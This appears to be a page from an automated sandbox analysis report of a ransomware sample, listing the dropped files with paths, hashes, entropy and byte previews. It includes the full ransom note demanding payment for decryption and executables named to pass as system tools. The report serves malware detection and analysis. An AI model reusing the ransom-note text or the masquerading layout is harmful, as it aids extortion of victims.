                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\util.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4602
                                                                                                                                      Entropy (8bit):7.955231201048663
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:9/9QM08aeqz/f6vd9I2r9Tq3/WJ1nUMBS6Eqa5XmP5b:9/WlWIW9qPE1nh8h5YBb
                                                                                                                                      MD5:A156C9E1E2B7F37EDB4E56398C3F0B84
                                                                                                                                      SHA1:45DDE8CD7150A7EF6BE742ED83D5241F21F8A9CE
                                                                                                                                      SHA-256:60CCB9E5BB3D133466E7AB43D7D3998ED3F1EA9EC1F7EC068CBA2737007AD3E1
                                                                                                                                      SHA-512:0CBB5A8DD07CA8C49554AC2AAA7D9E7722662A70430FB602DB6D995408E97616A00F12A3CECCF79D37258D35C5826E74C32B7CA4FF2E404CBF60F0F56724BD89
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****.IU.<....n.>|..}......kJ.L.z2|Qy.....#........dh.O~...S..u.%....(.k..."......j.2.7....-..z....z.qj......*,U....J.J.F....K.#.....j..F.....a..@...|/.c.0'$.....n...lj.1'......kMY.......I.C...|.0..l...I...p~....~.r..%.9...+...Y....h..Z.=..>.ll..3...r....<[o..6`.e33.........H........4......$.....^j.<N*......wT...]......<4........?....&.......?.....k^:..,.b..9.K...-#....#.Y(...,....W....5..s..T-...-...&..#6...t..S\qH..{vAK t.....s.{....M......)..~m..A..X=...c.b......-n...A...k........3...!..~f.....O...u{u7.r.."!.r.."m.k.....Eh.....z..R..bQ@@...Y.U..>1|.e.....O6....[.q.0.tS...C.S.r%..h.h..:.:kxA. ..u....tTF...P#O..om/.5<B...~j[72....to.N.D..@P./}L..B.b.JS.W...x]3x..8.7...f..Z.L.........^..).d$..gCh..0P.}/4.R.L.T:.B\..h.I.Z@[CP...BG.=:)m..2~.....{.....nt.&k`....0..~.....Z.C...c3.u......h.......:...3$..U .Cv..oj...R.`L.]I.a...D..#...."bP..,........m....t...... [0..2..`.a..p/..`...+..1.B..p..*.%..!..P.D.....D....{UTN...1V...$C...W.w.....

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\viewer-module-utils.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3684
                                                                                                                                      Entropy (8bit):7.943832539464669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eiBpYrtB0pw8TBzp8/4LHWR/clfGsICq6Q/9:7BpG/Uw8Vt8wLvfDIt6Q/9
                                                                                                                                      MD5:1270166D286F7805392157082D0D4043
                                                                                                                                      SHA1:E1DFF8C029AD8687942E1A5A66C54CA7BE760F18
                                                                                                                                      SHA-256:45F5799C95552FEF8ECA02483D22D8A2CCF4CCCCC4BA6DE4128A66A93ADA2970
                                                                                                                                      SHA-512:DB9465B5F58E4AADEBAB2C247F1402DAB5EF78DCDCDFBEBDA4DCC180EA79C0D988919CCBC36CA75469CBFFFB94F1A5074A56B032951F82180D8B69E5F53EBAAA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****....A>.>(.Y.'.8{z...IN..0...#'xO......3..$?..I.*J.\...j....E.3P..z".......>..g.9...U+(F.D".]23..X...3.......B..r#.Ao.........I...(.ZQ..XC.-.v.%'../..._AA.u./I...-A..K.t..b!.F..P..tT.......p..V'..z.\a.............q..&..4F.....Z...]?Ww|.th=U^.,..}=$5nt....5.6J....".x]..]]..._...:9..J....~..E...z.E....+s[T.,...V.s.J.w8.....&f.H.I%..4C.c..O......,TTeH$..sV...*/..3.$.T..S..........".5.K.R..J......?...U(...Ux.o.h!i.q_U..].......$..N'...l...I:.:.#.%9b/2H..~(%...1.j..k.ks.ROn|....S.7...........QeV,2..V.dUA...2.gmh1#.3(4<>.xx;.\...`/.[.-...Y..-...S+.H..b....._.8F.K.\.6..8......m.,.(:)3'x.X....6.#..P..K.........].J..._....R...e..F..~.. .....S.EZ..@../c.S...4.....^..iV.y..8.Z.J..W....2..5(....".qr...uu.....7A_SE{.*...<...K..)....;.sr&...F&...\z.x.>.....b".X.@;UR...B.WS.v.2}nm.Q...._..!.Bv......>..z..>.K.l.....r^7 ....3.q..^..H(.#...=..V.......k..1.J.P.s.M.VU9....1.u..fH.TS ..p....|..9L.....UQ.....~..Au=....9.w....b..Ek..hHp.B....}.....z.....;......c.0!..1

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\viewer-module.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8029
                                                                                                                                      Entropy (8bit):7.977897464780891
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:B8xkXze2ntlTizvyIZ9F/ZQPngxwtAgcFa8XC:2xqyMtlOJDBsngwYDXC
                                                                                                                                      MD5:83E850838FBC8D05773DB4C89659603E
                                                                                                                                      SHA1:80AD351332D8B4C0F3F151A7CBF76F00D6D2DE9A
                                                                                                                                      SHA-256:B23490B778CD67BFD7862A15175ECE84BB97C765CC101A17F38B244875F53DEC
                                                                                                                                      SHA-512:F8744E50B70DC72F923B474733F2790B2F4B4130E12185D3E8A3FEBFC72B30FC1DACA4B57831A29164FE733BAC21DC8CFCBFD53E7F2F8F7A3828FEC3266818D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****......r....LnM.W........E#.2v................y..2.9..S..Z.}..(M..ZDk...>A.........@M..S@.J(yxM.....={..~n..]..[.U...\.,.....g.0>..$.O.dUr.g..3J{P.Q......X..i\...k.......d.O"..A'.v....;..N.b.....h3#...:2....r.Ev.h.]...?M....(.Prl.c.~.$...=+.......w.P.1.....y.&S.$~aG.yYq..+..3.:...C$....k.+....b\..a.....J ....oR..iJ.m.t8}q.~..$.K..6..3.........R........i..B....@'.".0.7...Q.e.x.....p3..m....z..1..z..5...u6.!.H..-...k;.......d.^-.J....|.u.&....{.. ...<......N.x...?m..cI..@.Gsc..>..L^.....o...#.0.h.U........l.:|.3.|]z5..j.{..0..........{G...io..iN'..A.E...6TE...n..L.m..YP..\.D]I.....\.G-Z...d(....E..od....0.S.ZSyr......9...s./..(Un,Y.7.=..K.s..q#..N.t...@.,.|.....<a%mA....f.i.&.F......1Is..........S.a?w..W..).G..y......b@.D......x.j.3.i..{v.].s|(..58l.E...lb...W.E.r.6?..1 .j.&...S....e..Z..E.v/...k..X.PI...L....."...$.e!m.S..r..s..6(y.....J.?5.;.#.N....w..U.}..p....eP.z\...H..2k6*....#.....&0.).....|....7L.:.(>(G.K~O."?v...

                                                                                                                                      C:\Users\user\AppData\Local\VirtualStore\_README.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1381
                                                                                                                                      Entropy (8bit):4.871279842231698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw3P:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/ko
                                                                                                                                      MD5:5C0D2AF2BAB961C34BE63223AFBBE8AE
                                                                                                                                      SHA1:FF8D0B48F001D5BDF4750B3FC165BB35901ABA39
                                                                                                                                      SHA-256:C20FC1B29B3E90E6FDD470F188EA5B1F9BE3ABE2DD7182A446104BEED5B0F765
                                                                                                                                      SHA-512:3868A57A61249B2FD243F7C526ED976F8D7730DD49970809BCCAA9FA686C533F9348C7240146F8F17BA7319F99C41D19165B5DE25A94976879122144BD450729
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                      C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):780288
                                                                                                                                      Entropy (8bit):7.7015766496836555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:O53AxLUl6AiI6LWr0A91IaNnrC0RAbRXouUUfXZLCdSZSoHfx1uDbccdt7Hw:OAHuRr0U1IF1RXd9fQGSoHfGncit7Q
                                                                                                                                      MD5:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      SHA1:5B699F023304E78D905345B254EBC608A4726721
                                                                                                                                      SHA-256:62623BDDAB0911ECA4CD33135383761DBCF6F22A480EDA9761BECF638F1C4546
                                                                                                                                      SHA-512:1A81AB93E0045BE0408BFA5F18095DF63E7A504D5258E34F37B1A1A2357AEE955918E7852D70C0B269425A15661656CC71FCB4944D4546EB87893974B3F39349
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%G.a&..a&..a&..lt`.|&..lt_..&..lt^.M&..h^,.f&..a&...&...Z.`&..ltd.`&...a.`&..Richa&..........PE..L......c............................O?............@.............................................................................P.......................................8...............................@............................................text...x........................... ..`.rdata..p...........................@..@.data....]..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe:Zone.Identifier

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                      C:\Users\user\AppData\Local\bowsakkdestx.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):894
                                                                                                                                      Entropy (8bit):7.778172401936426
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YiaEquizD5Kt/3BOvslJ3W6NBnh0iXf21Hmo7Q0BEB7E+VXBFLsXAEYH+gVOukIX:Yy65KtpOYFPNlnEmbV17LsdYH+gpbD
                                                                                                                                      MD5:4C6BB7D7B0833CB8E5DA80C3FAE4DC59
                                                                                                                                      SHA1:4F7CC4472644F7BFBE8079D18EC91D91CFCDE800
                                                                                                                                      SHA-256:872A6F0C7B98011D983294C5E3E1A70F4CE0F8FD61102D078387715212B032FB
                                                                                                                                      SHA-512:50EFF9FD71DFE0A3E2D552DB6B2C91F6A74FCE70392E4DAC1923B7066D5AABB3C93A055D97F23718D6FD93A8C70542BD8D9816D6626AA35D3C8BBE6722FD8550
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"pub...........t..Og...#\....T.W...#.~j..m.d.C........v.MU..|.|......[.............qo.:......{.&.VN.4.=p....oN...r8:[Y}..pN|.SNS.=..1K..7Q.&~.. 3....K......+...'..........9...h"....:.$l........vp7._.o.....1.......>8...S&!...6....O,...........>...U.n..ecf.\..}>F..D6.{.sE..?..L.........5St.H.J..(.B......C..:2.>d.=...........5..!.|U/.c....^;..g..Pr.......%K..k.u.D.:94q....4...;...m....9...c..a..d..P)....Q..._.........@.'.!>.$.A..x<....d.A.SR..$~....$W.....mD...7g..]t...P..M.j ....c4...1.B..C..;.%s.Q.Q....3..XXu....&.n.vI.q.....\NA.6...`.![t.1v..[...@._W&.....O.dR.sZ.y.fB.U`m.92.f......9z.u..u...n....$w.Z=...a........k.eu....|..'1.[;l.-0B..H..1i....=......"......+.]e.A....uH.<9.;......D.....WFX..F....0XZ...`E. .l....*.D.C.7Y.6.J..e.....7D...^..=..p...%.......)...ptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Roaming\.curlrc

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):342
                                                                                                                                      Entropy (8bit):7.250814412714499
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:KW5mfonfEkUIryeAnsGWnO8XikDcwCIc6mc0JxyJBh7PPBkck33ukIcii96Z:N54onrrypxWnOnknVmxJxQBVPPBYnuk6
                                                                                                                                      MD5:35CD5D4F509D6A98D9768FF2E9B325BF
                                                                                                                                      SHA1:1E7FCFD85A17828435D8E92A6B9BEE2B6040A365
                                                                                                                                      SHA-256:CBBC95535994ABDC3EEAD01F60002B6E17FEAAD8D9417D4971F597E7F9B02D56
                                                                                                                                      SHA-512:952BA76D6D7A7EC16EAD0FC1C9EF15890602528EBF4610361A078A6096614614B47188C16EB729728AE8916C99B585E095E08519FA29B347910E797469603E6D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:insecO8i|./...Q.a'A2.)p..&...d.!.....L.B..+Q..CG._e..U*..^...[-[Z....x.I..fSv\...{.T.(..].+...z......J..i....Y.Ghn.........~..t.j...i+..-](....-..B....Ky'%<.I..y.....;M..w.._..}.i......T~.....V..lDk.1.Z9KCu....B...7A..-.P...S...;.x'i%.))..9.9..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):370
                                                                                                                                      Entropy (8bit):7.3038014539179015
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:+BZi9iQ9GrGwtjeU35AdAVzqKuzsQRj2B9QW/j0tL9Y2LVYzN33ukIcii96Z:2ZjQsrRYU35MA4KQpRiJ/cbxYhnukIcq
                                                                                                                                      MD5:68B694062AE7F5CF9A03ADFC9442F05F
                                                                                                                                      SHA1:F521D34DB6B86DED4162A25E8AA0E27A082D5CDC
                                                                                                                                      SHA-256:C523CB4244B1DFF3EEB342ABAB4C4C5DA0D28B0CD3E45E5E7EA05C0DC156C7A3
                                                                                                                                      SHA-512:D059175F4FC8D668E3B5A8C29A550E10475BB74CBF160D0A30A9C1E196C874252A109A9CC771E86E9F48503B9599C19830F6C14D0AB76758770EA45FBE9EFA9B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%PDFT...g..S.=G...v6..X.\.2..uF...HO.hF.f.A.x.%......\...4..M5GD..!u..cM#....Q.}......o.j6q.=:Q.}.I.>p.:.Ca....d...d...y..v..DRo...q..cs.|R.k.../..y{TF.o..)f..T....._^.....b.`...S.l..........[......^...&}...T.JQ;......k.8..<8..;.0-K.;Ux.r.~..Nx\......_..P..G;.S...... ...CkghPy...rtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.361231835910501
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:gqXVaWdKdQyqZZ8VwvEvlgZYwJduukIcii9a:gCKdQpZZ8VwvmgKwJdJbD
                                                                                                                                      MD5:226907008D61C25B68E0417DB07EC338
                                                                                                                                      SHA1:3A6B6B4B9C98C2E1443D0A83C8D532AE694EA813
                                                                                                                                      SHA-256:3E4568C616D615DD4203CAF34C42288B458AE7CEC14D752EFB88B9C8C1F550FD
                                                                                                                                      SHA-512:022DA823076A6C88C7B78E314381BA3EDE572CFBFF85DBFAE970FB090322A2EA0EA50BB5C1B6E2E441C72D7F3CBACF55CBF63F5FF44382382253B8F1263BDD3F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%PDFT...{ ...Ld....L..@..T..~.....a..]u.h..L. ....O....U/....r....`.........`.!Ny,.6..rsT..3..zvp..........b.N.,./w.')....mJ....U..Oq..A......7....Ht.7{<.......JZ..P70V'.+Z..d].=X....._mEh....u.."..V..L...Ot~...Ja....|...X..P.6.|..0.:..w.xM. .|W|.a.u.,:..(....j.5....a.....D.@}}..x._.k..L...O.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):306688
                                                                                                                                      Entropy (8bit):6.7250330334577075
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
                                                                                                                                      MD5:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      SHA1:1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
                                                                                                                                      SHA-256:FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
                                                                                                                                      SHA-512:CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1352
                                                                                                                                      Entropy (8bit):7.841467899239169
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:CRV9jePKk7Getx3ntPEv2TXVmqB8mhigmKWnHWEqefJl8qEJRQGP+hlf+NbD:ojeP96eb3tMsXVV8i7MnH/qYaJlef+tD
                                                                                                                                      MD5:6B721C52552E9244A3A96D1D3B5493AC
                                                                                                                                      SHA1:4BF5868034C9B56D3ADCD6964A420A8912FC3E85
                                                                                                                                      SHA-256:A7FD60D31D14F476964D12AAFCC90BD1091B140A9BC2630FAC4DDE0C8821A2F3
                                                                                                                                      SHA-512:E857B44C1B9577D3F116F3CB5A7E71C792AB5142F94CC8148BABF78FC0B4C4165972CAF2EA7AAC0842B44903B212B65018E1DBC9C82AF43E4FB50BF2C26B1D4A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...**......}.e+q...;...Z{.I.!..n.jB..Z..+vA=.r...I.}.=....%/.../c.K.5.8@.'.,.J..y.8.;XE.-JSGW.....S.....V....2z...&..,.7..p.U.x9.....*.6......@.O...I....../..-I.9.$. 1..y......mO+....LR.. Q....8^.f..r.u.l.....,..+...!.#..zM.....9c.(BF......As7..T...a^. .n.,.H.!3uk.\..{...}.*...C..h.5.m.a.r\..'.b........@.....~.4..lg..p.p.m..?.R%......%.l..@..N..:i.P.J;...[#Mg....V..P..\......MD.#.C8$..p...n...2....#2.DH..S....|S...........1......6EO...G+.j$..#...d...>h.....d..,.1.......3..JV.....-..hu .kR....h{\v.kx*1.J.f[4../`..F...e.."...<.^.u.W..-/\...![/.....M=.@+.:......G.s....K.9.DO.2L-....).*.....A..)..J[..-:.....u..&].[w...^....U..<...}~.T....].,...o..a*...t..0...q..I. ..8..3.7.}f.E....a......>.h..q.....9.7....D.....X/Zxzpb+..s<..c-......E..3@.8..{.....}..^.^7..|@}.Ju....d...O...I.,.k.0...R.).......QTxA]\f=!..c?...wn....x.oVx...K......."0..+....X+..!.%yb...MY..-....Z.0.K!1..T..*...:.y.Uk:A.J1o.......T...Jj?....._.s{.Z.1..60...

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2445
                                                                                                                                      Entropy (8bit):7.916776932112177
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Qo51G/4g1/srjHiRy/KCxkq0ZGbWKS8xBEhV8LMiADMsNRWnD:k310rT8yahZGbWz8E8LfqZa
                                                                                                                                      MD5:E8D9CEF39D2D3B32A1244E32ACF615B8
                                                                                                                                      SHA1:1A9FF277EFCF41B0BE9E29085A15EE8B7673ECE7
                                                                                                                                      SHA-256:5586FEF7D763FBA9DB356913C5AE3C80829D85173857485C847C5970BEDBFDF1
                                                                                                                                      SHA-512:67F64EEFB98950277AD97F55AB79E303572D3A939BCFA2C843F8B5D4AD0019FC206F9995ABD0562E18CE2FBD2AD05A3425C0CCBC1972587BC5E77356E9B85BB1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmltZt.....v1....)s........cw&.l....x.(%......Xo.......M.P.c|.#.."6......+.{...ux..>.....=.Rg8S.,..Eo6.8.i...R.....1.....?M...Ox:$...p..N..?WK4..P.X."MA~+.......a8*.7..-.z.....d.~..@.o..vxs.r.X....O...JU|..3:....o-......>..t.A....J.].,".......8.a5...Rnv...'.].o..p[...G7...$...uW.D#^a.o....F....(.w...0A.v...Sk.Uy.[+P.?d.d2(..E..!..Y.4...a.q...Dk.j....e\.?..........._.........+..+..i..O....}.5(....le...o..."4.$l.7...wR..da2..R.m...yF.......j.U.5.Os....c ...8..S.......k.TOR..<..22}...d..=x....FI9...S....R........l...\......~c..Y....Pa.ea..P.G.........?}W.u.....*...Y._y...9...._0.E_. O.....'.0o...u..F..!......w.%..X....D..M..9......Q.a..X..6.....6...h..Y.*.....7.....N.$..-.2.e..:......r.l...L,......RQx..cS..z;.YI....@T.(.*.........X.G.dZ+eM.L......o.1;.o..{|...A..b...C..1..]..../....j....h......e=...........Jv.?s.....ET....k.co."+..aAr.P.#...)hN.z<....}o..n.....Ep.RA..b....t....9..~.iR%..o~l..9..R.:...~J...{.{.ukw.<.GR.P|h=......|.&.$.O.{.<

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2402
                                                                                                                                      Entropy (8bit):7.92097144791001
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:VK9lHC59c0fg3sOnv/D/svWo8hnZJRBUErWkaqnBD:VK9U9c0POv/DU+nD8s17p
                                                                                                                                      MD5:6CD209DA8CD45CB673F2C5F08F29F912
                                                                                                                                      SHA1:247DCEF95284146376AACF8B38D537D418999AE7
                                                                                                                                      SHA-256:5F0CBB3E4C3FB9553CB4662043214399BE64628CF5ED902FA61198FFBAD7DF01
                                                                                                                                      SHA-512:EEE53359E28BAC6A9FF7AD809347B4700F3E499CD2AF3383B9FF12BD1B5E3C59933DEC1974E430BE4E41F22A7FA5A2D522CD894C9BC50985AD790EEA1B335013
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml........NF.......9.X.......8..u...:}.....e...o....O..6\t.Lf..8A....Y.Qs..`q..E........c.....f.`?....d...u|~Z..B.......\C.A._...[.'...T..fA.<D.*.EF.H.7.....z....?v..m../.S.a'.a.z.Ztv. .....%......GL........m..........R...7..u.Y.&I.=.$.$..'..LMi.G....(A.7.P...G.....`F=?9*{.+d........K..X.=.=.9.,.##q].I..E..........8..."...O..@.\;'2.`y...I.L....1.*\c.5..z......be...W>....-:...}.j....._Xa`..bPvOu.u..R....|...H1).(.&....Z!.a.F@1H.fb.....f...p...7..6..Y..{...=<...s.;.....M...?#.....-...pB......H.cj..Y...$..7_...s..<...kM..k.q.G.S...1....D..da~.......|.8xT..t...wP....(Q.._....).3..K.(...*.....'|/...N ..$.....'q..4.:..6H......r...?....o.}D...v..A.>..2..J........tD.+..C....>.........Q...'........y..9k6.H.cN.....q.....!Q.'..HJ.]...%'".l.<.<F....S`'.-.*...8.rF...........&.2P..$...T..\....9W.K...z{....NW..Xp...F.I.I:f....9..C......l......O........t.y .}..[......V.]..io...x.6a....O.b.O........c...CHH|.`..d.C...|.Z......p...;.../lX.{...].L.o\=2

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2420
                                                                                                                                      Entropy (8bit):7.918888737535357
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6kMNNPlcqlYQOqNTtIPvjMPmTP3pY8UwzudkiwrD:/mGwXNGjM+TP3plUQudwH
                                                                                                                                      MD5:12E1AF369BB6E8990026518A98469B1B
                                                                                                                                      SHA1:433AED0C2D0AB11E275B8C9DD1FD32D2DE7D1025
                                                                                                                                      SHA-256:8F90F7CFB78D6D549D6457CA835D2468D8B4B2E052D74462597D3416B25A67BB
                                                                                                                                      SHA-512:851436F378D0002BAB4F5519F4F77660A8B6D03CE7B3DFE34DDFBEC9DDDA8CF06CEF28FE1170008087D92728BD56CF8D654554BF4213AAA1C462EEE568DC7EEF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..X_....O.-.....Q\E.K...A....U....[.c,x.9...z..]....&..34;.[E/... .=m..\......Zg.T........uqR..8E]V6.'7...H#..l.:M.....gS../..}h_..$J...T.lz......X$.>.r.P....7...c.Z...f.#....Ip...!...q.....n..E.].~..>../."Z.f..........a.....2.=..h9,..C.T. .c.j...V..P....i....N6.q.,..Q.`*$.h....5.F...^}..Y..P.v....T6..$.e.r..v,.!b..l4=4......&.k.....4kU.e.O..k.{.-.'....-.0...I.4D...##....g.......j45....n.[......|.z..k..........1K.tn.....@'..9=pp.(].......=l....q...[..|.y^..$M..o....U.~f.t..hHe,V..#V1H............@......O..O.x._. a.......0..x7.....w.g.g...,....!y.J.....~.y...(`b..&Sc.5..ySBU|>.e....n^,. ..On..n........a..F.y..q...W.0........."..7..x...Cz.#.v.a.465....?..+..^.;.a....O..#..k....2XW..F..0.~5YN....s....|3.Q..V~.|....../*.pgy.v.up.....ib.6..6!ue..x.R.>....P?p..k.J..{.....d./.....D.o..YD...5.F.|*....)..u.`.'.....+yf..42.0...`.%.....f8..v.H.p....$U.......k.j..^....'...K3."...VC'.Z..`..q.o..x......H._@......C.N.x$e.W..^.......?.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms

                                                                                                                                      Download File
